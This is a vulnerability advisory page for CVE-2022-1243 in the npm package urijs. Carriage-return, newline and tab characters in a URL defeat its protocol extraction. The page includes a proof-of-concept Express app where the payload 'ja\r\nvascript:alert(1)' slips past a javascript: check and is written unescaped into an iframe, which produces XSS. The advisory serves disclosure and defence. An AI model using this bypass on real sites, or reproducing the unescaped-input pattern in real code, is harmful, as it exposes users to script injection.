Lucene search
GoogleOSV:GHSA-3VJF-82FF-P4R3HistoryApr 06, 2022 - 12:01 a.m.
Incorrect protocol extraction via \r, \n and \t characters
2022-04-0600:01:31
Google
osv.dev
20
0.001 Low
EPSS
Percentile
29.9%
\r, \n and \t characters in user-input URLs can potentially lead to incorrect protocol extraction when using npm package urijs prior to version 1.19.11.
This can lead to XSS when the module is used to prevent passing in malicious javascript: links into HTML or Javascript (see following example):
const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000
input = "ja\r\nvascript:alert(1)"
url = parse(input)
console.log(url)
app.get('/', (req, res) => {
if (url.protocol !== "javascript:") {res.send("<iframe src=\'" + input + "\'>CLICK ME!</iframe>")}
})
app.listen(port, () => {
console.log(`Example app listening on port ${port}`)
})
Related
osv
osv
CVE-2022-1243
2022-04-05 15:15:08
github
github
Incorrect protocol extraction via \r, \n and \t characters
2022-04-06 00:01:31
cve
cve
CVE-2022-1243
2022-04-05 15:15:08
ibm
ibm
veracode
veracode
Cross-site Scripting (XSS)
2022-04-06 07:39:38
nvd
nvd
CVE-2022-1243
2022-04-05 15:15:08
huntr
huntr
CRHTLF can lead to invalid protocol extraction potentially leading to XSS
2022-03-18 08:49:02
prion
prion
Cross site scripting
2022-04-05 15:15:00
cvelist
cvelist